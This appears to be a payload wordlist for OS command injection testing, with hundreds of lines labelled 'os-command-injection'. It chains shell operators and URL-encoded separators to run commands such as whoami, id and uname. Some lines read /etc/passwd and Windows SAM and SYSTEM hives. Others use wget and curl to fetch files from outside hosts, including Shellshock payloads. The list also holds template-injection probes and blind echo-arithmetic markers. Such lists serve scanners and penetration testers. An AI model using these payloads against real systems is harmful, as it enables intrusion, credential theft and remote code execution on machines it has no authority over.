XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX')' +os-command-injection,'systeminfo' +os-command-injection,'| systeminfo' +os-command-injection,'; systeminfo' +os-command-injection,'& systeminfo' +os-command-injection,'&& systeminfo' +os-command-injection,'system('ls')' +os-command-injection,'system('pwd')' +os-command-injection,'system('pwd');' +os-command-injection,'|| system('sleep 5');' +os-command-injection,'| system('sleep 5');' +os-command-injection,'; system('sleep 5');' +os-command-injection,'& system('sleep 5');' +os-command-injection,'&& system('sleep 5');' +os-command-injection,'system('sleep 5')' +os-command-injection,'system('sleep 5');' +os-command-injection,'system('wget https://crowdshield.com/.testing/rce_vuln.txt?req=22fd2w23')' +os-command-injection,'system('wget https://xerosecurity.com/.testing/rce_vuln.txt');' +os-command-injection,'system('whoami')' +os-command-injection,'system('whoami');' +os-command-injection,'test*; ls -lhtR /var/www/' +os-command-injection,'test* || perl -e 'print "X"x16096'' +os-command-injection,'test* | perl -e 'print "X"x16096'' +os-command-injection,'test* & perl -e 'print "X"x16096'' +os-command-injection,'test* && perl -e 'print "X"x16096'' +os-command-injection,'test*; perl -e 'print "X"x16096'' +os-command-injection,'$(`type C:\boot.ini`)' +os-command-injection,'&&type C:\\boot.ini' +os-command-injection,'| type C:\Windows\repair\SAM' +os-command-injection,'; type C:\Windows\repair\SAM' +os-command-injection,'& type C:\Windows\repair\SAM' +os-command-injection,'&& type C:\Windows\repair\SAM' +os-command-injection,'type C:\Windows\repair\SAM' +os-command-injection,'| type C:\Windows\repair\SYSTEM' +os-command-injection,'; type C:\Windows\repair\SYSTEM' +os-command-injection,'& type C:\Windows\repair\SYSTEM' +os-command-injection,'&& type C:\Windows\repair\SYSTEM' +os-command-injection,'type C:\Windows\repair\SYSTEM' +os-command-injection,'| type C:\WINNT\repair\SAM' +os-command-injection,'; type C:\WINNT\repair\SAM' +os-command-injection,'& type C:\WINNT\repair\SAM' +os-command-injection,'&& type C:\WINNT\repair\SAM' +os-command-injection,'type C:\WINNT\repair\SAM' +os-command-injection,'type C:\WINNT\repair\SYSTEM' +os-command-injection,'| type %SYSTEMROOT%\repair\SAM' +os-command-injection,'; type %SYSTEMROOT%\repair\SAM' +os-command-injection,'& type %SYSTEMROOT%\repair\SAM' +os-command-injection,'&& type %SYSTEMROOT%\repair\SAM' +os-command-injection,'type %SYSTEMROOT%\repair\SAM' +os-command-injection,'| type %SYSTEMROOT%\repair\SYSTEM' +os-command-injection,'; type %SYSTEMROOT%\repair\SYSTEM' +os-command-injection,'& type %SYSTEMROOT%\repair\SYSTEM' +os-command-injection,'&& type %SYSTEMROOT%\repair\SYSTEM' +os-command-injection,'type %SYSTEMROOT%\repair\SYSTEM' +os-command-injection,'uname' +os-command-injection,';uname;' +os-command-injection,'| uname -a' +os-command-injection,'; uname -a' +os-command-injection,'& uname -a' +os-command-injection,'&& uname -a' +os-command-injection,'uname -a' +os-command-injection,'|/usr/bin/id' +os-command-injection,';|/usr/bin/id|' +os-command-injection,';/usr/bin/id|' +os-command-injection,'$;/usr/bin/id' +os-command-injection,'() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://135.23.158.130/.testing/shellshock.txt?vuln=13;curl http://135.23.158.130/.testing/shellshock.txt?vuln=15;\");'' +os-command-injection,'() { :;}; wget http://135.23.158.130/.testing/shellshock.txt?vuln=11' +os-command-injection,'| wget http://crowdshield.com/.testing/rce.txt' +os-command-injection,'& wget http://crowdshield.com/.testing/rce.txt' +os-command-injection,'; wget https://crowdshield.com/.testing/rce_vuln.txt' +os-command-injection,'$(`wget https://crowdshield.com/.testing/rce_vuln.txt`)' +os-command-injection,'&& wget https://crowdshield.com/.testing/rce_vuln.txt' +os-command-injection,'wget https://crowdshield.com/.testing/rce_vuln.txt' +os-command-injection,'$(`wget https://crowdshield.com/.testing/rce_vuln.txt?req=22jjffjbn`)' +os-command-injection,'which curl' +os-command-injection,'which gcc' +os-command-injection,'which nc' +os-command-injection,'which netcat' +os-command-injection,'which perl' +os-command-injection,'which python' +os-command-injection,'which wget' +os-command-injection,'whoami' +os-command-injection,'| whoami' +os-command-injection,'; whoami' +os-command-injection,'' whoami' +os-command-injection,'' || whoami' +os-command-injection,'' & whoami' +os-command-injection,'' && whoami' +os-command-injection,''; whoami' +os-command-injection,'" whoami' +os-command-injection,'" || whoami' +os-command-injection,'" | whoami' +os-command-injection,'" & whoami' +os-command-injection,'" && whoami' +os-command-injection,'"; whoami' +os-command-injection,'$(`whoami`)' +os-command-injection,'& whoami' +os-command-injection,'&& whoami' +os-command-injection,'{{ get_user_file("C:\boot.ini") }}' +os-command-injection,'{{ get_user_file("/etc/hosts") }}' +os-command-injection,'{{ get_user_file("/etc/passwd") }}' +os-command-injection,'{{4+4}}' +os-command-injection,'{{4+8}}' +os-command-injection,'{{person.secret}}' +os-command-injection,'{{person.name}}' +os-command-injection,'{1} + {1}' +os-command-injection,'{% For c in [1,2,3]%} {{c, c, c}} {% endfor%}' +os-command-injection,'{{[] .__ Class __.__ base __.__ subclasses __ ()}}' +os-command-injection,';id\n' +os-command-injection,'|usr/bin/id\n' +os-command-injection,'|nid\n' +os-command-injection,'`id`' +os-command-injection,'`/usr/bin/id`' +os-command-injection,'a);id' +os-command-injection,'a;id' +os-command-injection,'a);id;' +os-command-injection,'a;id;' +os-command-injection,'a);id|' +os-command-injection,'a;id|' +os-command-injection,'a)|id' +os-command-injection,'a|id' +os-command-injection,'a)|id;' +os-command-injection,'a|id' +os-command-injection,'|/bin/ls -al' +os-command-injection,'a);/usr/bin/id' +os-command-injection,'a;/usr/bin/id' +os-command-injection,'a);/usr/bin/id;' +os-command-injection,'a;/usr/bin/id;' +os-command-injection,'a);/usr/bin/id|' +os-command-injection,'a;/usr/bin/id|' +os-command-injection,'a)|/usr/bin/id' +os-command-injection,'a|/usr/bin/id' +os-command-injection,'a)|/usr/bin/id;' +os-command-injection,'a|/usr/bin/id' +os-command-injection,';system('cat%20/etc/passwd')' +os-command-injection,';system('id')' +os-command-injection,';system('/usr/bin/id')' +os-command-injection,'%0Acat%20/etc/passwd' +os-command-injection,'%0A/usr/bin/id' +os-command-injection,'%0Aid' +os-command-injection,'%0A/usr/bin/id%0A' +os-command-injection,'%0Aid%0A' +os-command-injection,'& ping -i 30 127.0.0.1 &' +os-command-injection,'& ping -n 30 127.0.0.1 &' +os-command-injection,'%0a ping -i 30 127.0.0.1 %0a' +os-command-injection,'`ping 127.0.0.1`' +os-command-injection,'| id' +os-command-injection,'& id' +os-command-injection,'; id' +os-command-injection,'%0a id %0a' +os-command-injection,'`id`' +os-command-injection,'$;/usr/bin/id' +os-command-injection,'echo%20AGIYMZ$((69%2B52))$(echo%20AGIYMZ)AGIYMZ' +os-command-injection,'%20echo%20TDJHRY$((30%2B41))$(echo%20TDJHRY)TDJHRY' +os-command-injection,';echo%20MPCSBG$((54%2B42))$(echo%20MPCSBG)MPCSBG' +os-command-injection,'&echo%20NWMZCF$((57%2B72))$(echo%20NWMZCF)NWMZCF' +os-command-injection,'|echo%20TJEGSE$((27%2B57))$(echo%20TJEGSE)TJEGSE' +os-command-injection,'||echo%20ANSBHE$((26%2B89))$(echo%20ANSBHE)ANSBHE' +os-command-injection,'&&echo%20PVJXOS$((12%2B1))$(echo%20PVJXOS)PVJXOS' +os-command-injection,'%0aecho%20VVIEOJ$((30%2B78))$(echo%20VVIEOJ)VVIEOJ' +os-command-injection,'%3Becho%20SRPJET$((29%2B34))$(echo%20SRPJET)SRPJET' +os-command-injection,'%26echo%20NQPWBV$((16%2B77))$(echo%20NQPWBV)NQPWBV' +os-command-injection,'%26%26echo%20QOZRFB$((19%2B4))$(echo%20QOZRFB)QOZRFB' +os-command-injection,'%7Cecho%20IRODNG$((26%2B68))$(echo%20IRODNG)IRODNG' +os-command-injection,'%7C%7Cecho%20KRCSNE$((57%2B75))$(echo%20KRCSNE)KRCSNE' +os-command-injection,'echo%20IFNPXI$((40%2B99))$(echo%20IFNPXI)IFNPXI'' +os-command-injection,'%20echo%20HBFEEM$((46%2B2))$(echo%20HBFEEM)HBFEEM'' +os-command-injection,';echo%20KHMFRS$((69%2B67))$(echo%20KHMFRS)KHMFRS'' +os-command-injection,'&echo%20DACXMN$((57%2B35))$(echo%20DACXMN)DACXMN'' +os-command-injection,'|echo%20DDLJJW$((33%2B23))$(echo%20DDLJJW)DDLJJW'' +os-command-injection,'||echo%20XIYAUA$((17%2B90))$(echo%20XIYAUA)XIYAUA'' +os-command-injection,'&&echo%20CMMOTV$((30%2B10))$(echo%20CMMOTV)CMMOTV'' +os-command-injection,'%0aecho%20VKWHEH$((83%2B36))$(echo%20VKWHEH)VKWHEH'' +os-command-injection,'%3Becho%20RDKWWC$((22%2B44))$(echo%20RDKWWC)RDKWWC'' +os-command-injection,'%26echo%20VOANQN$((77%2B86))$(echo%20VOANQN)VOANQN'' +os-command-injection,'%26%26echo%20EXUMZL$((4%2B99))$(echo%20EXUMZL)EXUMZL'' +os-command-injection,'%7Cecho%20VDZSYZ$((58%2B1))$(echo%20VDZSYZ)VDZSYZ'' +os-command-injection,'%7C%7Cecho%20HYHREQ$((78%2B11))$(echo%20HYHREQ)HYHREQ'' +os-command-injection,'echo%20GHWFXG$((12%2B72))$(echo%20GHWFXG)GHWFXG"' +os-command-injection,'%20echo%20BAJXZZ$((73%2B7))$(echo%20BAJXZZ)BAJXZZ"' +os-command-injection,';echo%20YRBNTY$((83%2B14))$(echo%20YRBNTY)YRBNTY"' +os-command-injection,'&echo%20WQLTXV$((0%2B25))$(echo%20WQLTXV)WQLTXV"' +os-command-injection,'|echo%20PRCGGO$((57%2B79))$(echo%20PRCGGO)PRCGGO"' +os-command-injection,'||echo%20RWZHCR$((74%2B28))$(echo%20RWZHCR)RWZHCR"' +os-command-injection,'&&echo%20QTDSQL$((20%2B35))$(echo%20QTDSQL)QTDSQL"' +os-command-injection,'%0aecho%20NCRQQT$((66%2B95))$(echo%20NCRQQT)NCRQQT"' +os-command-injection,'%3Becho%20QXBWJP$((56%2B78))$(echo%20QXBWJP)QXBWJP"' +os-command-injection,'%26echo%20YYWLTQ$((61%2B71))$(echo%20YYWLTQ)YYWLTQ"' +os-command-injection,'%26%26echo%20XKFEGJ$((1%2B49))$(echo%20XKFEGJ)XKFEGJ"' +os-command-injection,'%7Cecho%20YPOSVR$((24%2B62))$(echo%20YPOSVR)YPOSVR"' +os-command-injection,'%7C%7Cecho%20CFGBVN$((38%2B88))$(echo%20CFGBVN)CFGBVN"' +os-command-injection,'echo%20CWRXRJ$((77%2B13))$(echo%20CWRXRJ)CWRXRJ' +os-command-injection,'%20echo%20IBQHOS$((92%2B76))$(echo%20IBQHOS)IBQHOS' +os-command-injection,';echo%20CSPAAF$((48%2B26))$(echo%20CSPAAF)CSPAAF' +os-command-injection,'&echo%20DRUCFI$((69%2B56))$(echo%20DRUCFI)DRUCFI' +os-command-injection,'|echo%20TWNZDU$((10%2B40))$(echo%20TWNZDU)TWNZDU' +os-command-injection,'||echo%20TPIMPW$((11%2B13))$(echo%20TPIMPW)TPIMPW' +os-command-injection,'&&echo%20FOJNEL$((64%2B8))$(echo%20FOJNEL)FOJNEL' +os-command-injection,'%0aecho%20MBVQWK$((48%2B90))$(echo%20MBVQWK)MBVQWK' +os-command-injection,'%3Becho%20RHJGKQ$((38%2B71))$(echo%20RHJGKQ)RHJGKQ' +os-command-injection,'%26echo%20MUQJWT$((7%2B78))$(echo%20MUQJWT)MUQJWT' +os-command-injection,'%26%26echo%20KHAVOV$((90%2B77))$(echo%20KHAVOV)KHAVOV' +os-command-injection,'%7Cecho%20SUHDBU$((66%2B15))$(echo%20SUHDBU)SUHDBU' +os-command-injection,'%7C%7Cecho%20FEGCUU$((21%2B29))$(echo%20FEGCUU)FEGCUU' +os-command-injection,'echo%20DINEVC$((57%2B17))$(echo%20DINEVC)DINEVC//' +os-command-injection,'%20echo%20BSYIFX$((64%2B71))$(echo%20BSYIFX)BSYIFX//' +os-command-injection,';echo%20FRDAGY$((96%2B63))$(echo%20FRDAGY)FRDAGY//' +os-command-injection,'&echo%20QLUITC$((73%2B99))$(echo%20QLUITC)QLUITC//' +os-command-injection,'|echo%20SBZVBA$((97%2B74))$(echo%20SBZVBA)SBZVBA//' +os-command-injection,'||echo%20ZZJQZV$((83%2B59))$(echo%20ZZJQZV)ZZJQZV//' +os-command-injection,'&&echo%20RIWFAA$((64%2B99))$(echo%20RIWFAA)RIWFAA//' +os-command-injection,'%0aecho%20MESJOF$((62%2B27))$(echo%20MESJOF)MESJOF//' +os-command-injection,'%3Becho%20SVKHMK$((30%2B19))$(echo%20SVKHMK)SVKHMK//' +os-command-injection,'%26echo%20ZPAVCI$((24%2B53))$(echo%20ZPAVCI)ZPAVCI//' +os-command-injection,'%26%26echo%20MXMWUR$((62%2B86))$(echo%20MXMWUR)MXMWUR//' +os-command-injection,'%7Cecho%20AGUYET$((89%2B40))$(echo%20AGUYET)AGUYET//' +os-command-injection,'%7C%7Cecho%20SBQJMU$((91%2B44))$(echo%20SBQJMU)SBQJMU//' +os-command-injection,'echo%20ZUXLTJ$((16%2B69))$(echo%20ZUXLTJ)ZUXLTJ\' +os-command-injection,'%20echo%20QQZCOQ$((29%2B94))$(echo%20QQZCOQ)QQZCOQ\' +os-command-injection,';echo%20KHCYPO$((77%2B38))$(echo%20KHCYPO)KHCYPO\' +os-command-injection,'&echo%20MCEEEZ$((59%2B2))$(echo%20MCEEEZ)MCEEEZ\' +os-command-injection,'|echo%20OYDZIJ$((96%2B61))$(echo%20OYDZIJ)OYDZIJ\' +os-command-injection,'||echo%20PJBTDO$((60%2B74))$(echo%20PJBTDO)PJBTDO\' +os-command-injection,'&&echo%20HETHMD$((47%2B99))$(echo%20HETHMD)HETHMD\' +os-command-injection,'%0aecho%20HNNUGD$((25%2B95))$(echo%20HNNUGD)HNNUGD\' +os-command-injection,'%3Becho%20OFIKGO$((60%2B50))$(echo%20OFIKGO)OFIKGO\' +os-command-injection,'%26echo%20RKCZIL$((79%2B92))$(echo%20RKCZIL)RKCZIL\' +os-command-injection,'%26%26echo%20WLJUON$((15%2B95))$(echo%20WLJUON)WLJUON\' +os-command-injection,'%7Cecho%20WEBPND$((27%2B55))$(echo%20WEBPND)WEBPND\' +os-command-injection,'%7C%7Cecho%20HKTMWP$((40%2B9))$(echo%20HKTMWP)HKTMWP\' +os-command-injection,'echo%20MTEZNM$((22%2B3))$(echo%20MTEZNM)MTEZNM&' +os-command-injection,'%20echo%20YPQTYX$((9%2B27))$(echo%20YPQTYX)YPQTYX&' +os-command-injection,';echo%20UNXFGJ$((26%2B60))$(echo%20UNXFGJ)UNXFGJ&' +os-command-injection,'&echo%20KUCRVN$((73%2B39))$(echo%20KUCRVN)KUCRVN&' +os-command-injection,'|echo%20FNYPPK$((77%2B83))$(echo%20FNYPPK)FNYPPK&' +os-command-injection,'||echo%20NRVZFD$((41%2B1))$(echo%20NRVZFD)NRVZFD&' +os-command-injection,'&&echo%20QAGWEJ$((84%2B54))$(echo%20QAGWEJ)QAGWEJ&' +os-command-injection,'%0aecho%20HNTZSH$((50%2B30))$(echo%20HNTZSH)HNTZSH&' +os-command-injection,'%3Becho%20HGVPJY$((28%2B49))$(echo%20HGVPJY)HGVPJY&' +os-command-injection,'%26echo%20FWAUTF$((39%2B22))$(echo%20FWAUTF)FWAUTF&' +os-command-injection,'%26%26echo%20BSQKBM$((74%2B49))$(echo%20BSQKBM)BSQKBM&' +os-command-injection,'%7Cecho%20SEIDBX$((80%2B51))$(echo%20SEIDBX)SEIDBX&' +os-command-injection,'%7C%7Cecho%20TVKSTF$((99%2B96))$(echo%20TVKSTF)TVKSTF&' +os-command-injection,'echo%20XOEUCM$((23%2B30))$(echo%20XOEUCM)XOEUCM|' +os-command-injection,'%20echo%20DRFYNB$((7%2B97))$(echo%20DRFYNB)DRFYNB|' +os-command-injection,';echo%20SIRYMP$((7%2B6))$(echo%20SIRYMP)SIRYMP|' +os-command-injection,'&echo%20SPRAWO$((58%2B5))$(echo%20SPRAWO)SPRAWO|' +os-command-injection,'|echo%20OTDJOE$((4%2B21))$(echo%20OTDJOE)OTDJOE|' +os-command-injection,'||echo%20RFRIIL$((68%2B10))$(echo%20RFRIIL)RFRIIL|' +os-command-injection,'&&echo%20GKEMGA$((51%2B90))$(echo%20GKEMGA)GKEMGA|' +os-command-injection,'%0aecho%20ZNOLCP$((67%2B83))$(echo%20ZNOLCP)ZNOLCP|' +os-command-injection,'%3Becho%20PSHEAA$((43%2B12))$(echo%20PSHEAA)PSHEAA|' +os-command-injection,'%26echo%20YPFSZA$((90%2B71))$(echo%20YPFSZA)YPFSZA|' +os-command-injection,'%26%26echo%20BHDDGG$((67%2B94))$(echo%20BHDDGG)BHDDGG|' +os-command-injection,'%7Cecho%20UFFOUX$((59%2B47))$(echo%20UFFOUX)UFFOUX|' +os-command-injection,'%7C%7Cecho%20CXXXGW$((34%2B53))$(echo%20CXXXGW)CXXXGW|' +os-command-injection,'echo%20URJEMH$((2%2B45))$(echo%20URJEMH)URJEMH%27' +os-command-injection,'%20echo%20ALRHIH$((11%2B27))$(echo%20ALRHIH)ALRHIH%27' +os-command-injection,';echo%20IPTSZG$((46%2B17))$(echo%20IPTSZG)IPTSZG%27' +os-command-injection,'&echo%20YHCAGI$((22%2B26))$(echo%20YHCAGI)YHCAGI%27' +os-command-injection,'|echo%20DZPIWA$((18%2B47))$(echo%20DZPIWA)DZPIWA%27' +os-command-injection,'||echo%20SJZFWV$((8%2B68))$(echo%20SJZFWV)SJZFWV%27' +os-command-injection,'&&echo%20QZXLOK$((2%2B27))$(echo%20QZXLOK)QZXLOK%27' +os-command-injection,'%0aecho%20URBCMK$((17%2B54))$(echo%20URBCMK)URBCMK%27' +os-command-injection,'%3Becho%20QHDGWH$((99%2B66))$(echo%20QHDGWH)QHDGWH%27' +os-command-injection,'%26echo%20WOTYOT$((32%2B39))$(echo%20WOTYOT)WOTYOT%27' +os-command-injection,'%26%26echo%20CSSQPT$((9%2B40))$(echo%20CSSQPT)CSSQPT%27' +os-command-injection,'%7Cecho%20CPQTYB$((64%2B20))$(echo%20CPQTYB)CPQTYB%27' +os-command-injection,'%7C%7Cecho%20EBGHXU$((74%2B4))$(echo%20EBGHXU)EBGHXU%27' +os-command-injection,'echo%20LENNLE$((14%2B89))$(echo%20LENNLE)LENNLE%22' +os-command-injection,'%20echo%20FPVLKT$((63%2B87))$(echo%20FPVLKT)FPVLKT%22' +os-command-injection,';echo%20OIHFAC$((90%2B34))$(echo%20OIHFAC)OIHFAC%22' +os-command-injection,'&echo%20QLFUON$((35%2B62))$(echo%20QLFUON)QLFUON%22' +os-command-injection,'|echo%20GEPPDW$((55%2B58))$(echo%20GEPPDW)GEPPDW%22' +os-command-injection,'||echo%20DETQCQ$((28%2B83))$(echo%20DETQCQ)DETQCQ%22' +os-command-injection,'&&echo%20BALAGY$((97%2B95))$(echo%20BALAGY)BALAGY%22' +os-command-injection,'%0aecho%20PETUUK$((81%2B85))$(echo%20PETUUK)PETUUK%22' +os-command-injection,'%3Becho%20LBKHXK$((90%2B74))$(echo%20LBKHXK)LBKHXK%22' +os-command-injection,'%26echo%20JOADAU$((32%2B46))$(echo%20JOADAU)JOADAU%22' +os-command-injection,'%26%26echo%20DNDLZD$((92%2B6))$(echo%20DNDLZD)DNDLZD%22' +os-command-injection,'%7Cecho%20ORHNZL$((45%2B63))$(echo%20ORHNZL)ORHNZL%22' +os-command-injection,'%7C%7Cecho%20TEDJVC$((96%2B45))$(echo%20TEDJVC)TEDJVC%22' +os-command-injection,'echo%20AQRKLL$((20%2B31))$(echo%20AQRKLL)AQRKLL%5C%5C' +os-command-injection,'%20echo%20CKFAYE$((18%2B45))$(echo%20CKFAYE)CKFAYE%5C%5C' +os-command-injection,';echo%20HYBMMW$((16%2B36))$(echo%20HYBMMW)HYBMMW%5C%5C' +os-command-injection,'&echo%20NOKSUR$((8%2B35))$(echo%20NOKSUR)NOKSUR%5C%5C' +os-command-injection,'|echo%20OTDXSU$((6%2B1))$(echo%20OTDXSU)OTDXSU%5C%5C' +os-command-injection,'||echo%20KFLFGL$((10%2B4))$(echo%20KFLFGL)KFLFGL%5C%5C' +os-command-injection,'&&echo%20MKGYYL$((46%2B31))$(echo%20MKGYYL)MKGYYL%5C%5C' +os-command-injection,'%0aecho%20ANSTBN$((20%2B35))$(echo%20ANSTBN)ANSTBN%5C%5C' +os-command-injection,'%3Becho%20OHYLGW$((56%2B18))$(echo%20OHYLGW)OHYLGW%5C%5C' +os-command-injection,'%26echo%20NFGINK$((64%2B92))$(echo%20NFGINK)NFGINK%5C%5C' +os-command-injection,'%26%26echo%20EJACRB$((30%2B66))$(echo%20EJACRB)EJACRB%5C%5C' +os-command-injection,'%7Cecho%20QNJYVT$((4%2B44))$(echo%20QNJYVT)QNJYVT%5C%5C' +os-command-injection,'%7C%7Cecho%20UBHYQD$((55%2B41))$(echo%20UBHYQD)UBHYQD%5C%5C' +os-command-injection,'echo%20TJAXUJ$((80%2B70))$(echo%20TJAXUJ)TJAXUJ%2F%2F' +os-command-injection,'%20echo%20RGMCLI$((27%2B75))$(echo%20RGMCLI)RGMCLI%2F%2F' +os-command-injection,';echo%20KUXGTM$((7%2B89))$(echo%20KUXGTM)KUXGTM%2F%2F' +os-command-injection,'&echo%20CCYVIF$((50%2B63))$(echo%20CCYVIF)CCYVIF%2F%2F' +os-command-injection,'|echo%20GRWCHE$((81%2B54))$(echo%20GRWCHE)GRWCHE%2F%2F' +os-command-injection,'||echo%20OZJGZU$((76%2B56))$(echo%20OZJGZU)OZJGZU%2F%2F' +os-command-injection,'&&echo%20RLCXAD$((4%2B93))$(echo%20RLCXAD)RLCXAD%2F%2F' +os-command-injection,'%0aecho%20KYMBVZ$((7%2B62))$(echo%20KYMBVZ)KYMBVZ%2F%2F' +os-command-injection,'%3Becho%20SVFHGU$((48%2B4))$(echo%20SVFHGU)SVFHGU%2F%2F' +os-command-injection,'%26echo%20OXZPGU$((40%2B61))$(echo%20OXZPGU)OXZPGU%2F%2F' +os-command-injection,'%26%26echo%20PUUCTR$((68%2B33))$(echo%20PUUCTR)PUUCTR%2F%2F' +os-command-injection,'%7Cecho%20CGYJPN$((45%2B35))$(echo%20CGYJPN)CGYJPN%2F%2F' +os-command-injection,'%7C%7Cecho%20XVNYDY$((93%2B18))$(echo%20XVNYDY)XVNYDY%2F%2F' +os-command-injection,'echo%20ZZAYTQ$((30%2B82))$(echo%20ZZAYTQ)ZZAYTQ%26' +os-command-injection,'%20echo%20TWTKKJ$((67%2B81))$(echo%20TWTKKJ)TWTKKJ%26' +os-command-injection,';echo%20DDXENF$((29%2B82))$(echo%20DDXENF)DDXENF%26' +os-command-injection,'&echo%20JFDHZU$((1%2B12))$(echo%20JFDHZU)JFDHZU%26' +os-command-injection,'|echo%20PAKNUK$((48%2B25))$(echo%20PAKNUK)PAKNUK%26' +os-command-injection,'||echo%20IHELYG$((76%2B62))$(echo%20IHELYG)IHELYG%26' +os-command-injection,'&&echo%20LOAKXY$((52%2B22))$(echo%20LOAKXY)LOAKXY%26' +os-command-injection,'%0aecho%20JXLHHG$((94%2B73))$(echo%20JXLHHG)JXLHHG%26' +os-command-injection,'%3Becho%20FAHQNN$((39%2B84))$(echo%20FAHQNN)FAHQNN%26' +os-command-injection,'%26echo%20RDICIX$((99%2B44))$(echo%20RDICIX)RDICIX%26' +os-command-injection,'%26%26echo%20ZTWRSM$((30%2B32))$(echo%20ZTWRSM)ZTWRSM%26' +os-command-injection,'%7Cecho%20LLYIHD$((46%2B68))$(echo%20LLYIHD)LLYIHD%26' +os-command-injection,'%7C%7Cecho%20OYGMVZ$((16%2B56))$(echo%20OYGMVZ)OYGMVZ%26' +os-command-injection,'echo%20LZWGVJ$((6%2B60))$(echo%20LZWGVJ)LZWGVJ%7C' +os-command-injection,'%20echo%20YEOGLL$((28%2B5))$(echo%20YEOGLL)YEOGLL%7C' +os-command-injection,';echo%20MXKHVK$((46%2B71))$(echo%20MXKHVK)MXKHVK%7C' +os-command-injection,'&echo%20OSJJGL$((20%2B68))$(echo%20OSJJGL)OSJJGL%7C' +os-command-injection,'|echo%20FZLTEJ$((27%2B72))$(echo%20FZLTEJ)FZLTEJ%7C' +os-command-injection,'||echo%20ZLPJPQ$((81%2B32))$(echo%20ZLPJPQ)ZLPJPQ%7C' +os-command-injection,'&&echo%20KXTSXC$((16%2B52))$(echo%20KXTSXC)KXTSXC%7C' +os-command-injection,'%0aecho%20QUHONN$((15%2B27))$(echo%20QUHONN)QUHONN%7C' +os-command-injection,'%3Becho%20YORHEJ$((41%2B36))$(echo%20YORHEJ)YORHEJ%7C' +os-command-injection,'%26echo%20MHEMLM$((72%2B41))$(echo%20MHEMLM)MHEMLM%7C' +os-command-injection,'%26%26echo%20FFQWQY$((35%2B58))$(echo%20FFQWQY)FFQWQY%7C' +os-command-injection,'%7Cecho%20DPZHUT$((28%2B81))$(echo%20DPZHUT)DPZHUT%7C' +os-command-injection,'%7C%7Cecho%20FFBSEF$((15%2B13))$(echo%20FFBSEF)FFBSEF%7C' +os-command-injection,''echo%20OKVFZD$((59%2B78))$(echo%20OKVFZD)OKVFZD' +os-command-injection,''%20echo%20KSLOZF$((6%2B29))$(echo%20KSLOZF)KSLOZF' +os-command-injection,'';echo%20PWKXHB$((27%2B16))$(echo%20PWKXHB)PWKXHB' +os-command-injection,''&echo%20EBREVB$((48%2B67))$(echo%20EBREVB)EBREVB' +os-command-injection,''|echo%20TRMWWT$((44%2B53))$(echo%20TRMWWT)TRMWWT' +os-command-injection,''||echo%20JQACJR$((33%2B35))$(echo%20JQACJR)JQACJR' +os-command-injection,''&&echo%20ZJEXPP$((7%2B99))$(echo%20ZJEXPP)ZJEXPP' +os-command-injection,''%0aecho%20ICLECP$((72%2B88))$(echo%20ICLECP)ICLECP' +os-command-injection,''%3Becho%20VUJCMW$((70%2B75))$(echo%20VUJCMW)VUJCMW' +os-command-injection,''%26echo%20JPCWXJ$((42%2B48))$(echo%20JPCWXJ)JPCWXJ' +os-command-injection,''%26%26echo%20ATQDYD$((66%2B7))$(echo%20ATQDYD)ATQDYD' +os-command-injection,''%7Cecho%20LPCJMS$((42%2B26))$(echo%20LPCJMS)LPCJMS' +os-command-injection,''%7C%7Cecho%20PROWNM$((55%2B15))$(echo%20PROWNM)PROWNM' +os-command-injection,''echo%20VKYYJY$((60%2B15))$(echo%20VKYYJY)VKYYJY'' +os-command-injection,''%20echo%20CFTYMJ$((83%2B12))$(echo%20CFTYMJ)CFTYMJ'' +os-command-injection,'';echo%20NUCRTG$((61%2B63))$(echo%20NUCRTG)NUCRTG'' 